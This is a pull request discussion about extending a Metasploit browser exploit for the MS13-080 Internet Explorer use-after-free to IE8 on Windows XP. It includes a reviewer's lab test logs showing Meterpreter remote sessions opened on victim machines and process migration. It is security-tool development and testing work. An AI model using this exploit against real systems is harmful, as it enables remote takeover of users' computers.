win XP IE8 exploit for MS13-080

[webstersprodigy]

ie_setmousecapture_uaf only supported IE9 on windows 7, but the vuln was present in different versions of IE. I tested with Windows xp sp3 and IE8 and the exploit works pretty reliably (included the specific mshtml version in the code). I did not test that I did not break the win7 IE9 exploit as I didn't have that setup (but there shouldn't be anything changed)

This pull request is probably not very useful in real life - I was just messing around.

[wchen-r7]

I have not forgotten this PR. Want to do this but occupied with other stuff atm.

[wchen-r7]

Tested:

IE9:

msf exploit(ie_setmousecapture_uaf) > [*] Using URL: http://0.0.0.0:8080/mtAFOHcX6lJL
[*]  Local IP: http://10.6.0.118:8080/mtAFOHcX6lJL
[*] Server started.
[*] 10.6.0.209       ie_setmousecapture_uaf - Gathering target information.
[*] 10.6.0.209       ie_setmousecapture_uaf - Sending response HTML.
[*] Sending stage (770048 bytes) to 10.6.0.209
[*] Meterpreter session 1 opened (10.6.0.118:4444 -> 10.6.0.209:49203) at 2014-12-03 13:43:56 -0600
[*] Session ID 1 (10.6.0.118:4444 -> 10.6.0.209:49203) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: rundll32.exe (2420)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1088
[+] Successfully migrated to process 

msf exploit(ie_setmousecapture_uaf) >

IE8 (XP):

msf exploit(ie_setmousecapture_uaf) > [*] Using URL: http://172.16.23.1:8080/AcUinEiHgAWdsWM
[*] Server started.
[*] 172.16.23.129    ie_setmousecapture_uaf - Gathering target information.
[*] 172.16.23.129    ie_setmousecapture_uaf - Sending response HTML.
[*] Sending stage (770048 bytes) to 172.16.23.129
[*] Meterpreter session 3 opened (172.16.23.1:4444 -> 172.16.23.129:1951) at 2014-12-03 14:10:42 -0600
[*] Session ID 3 (172.16.23.1:4444 -> 172.16.23.129:1951) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: rundll32.exe (876)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2252
[+] Successfully migrated to process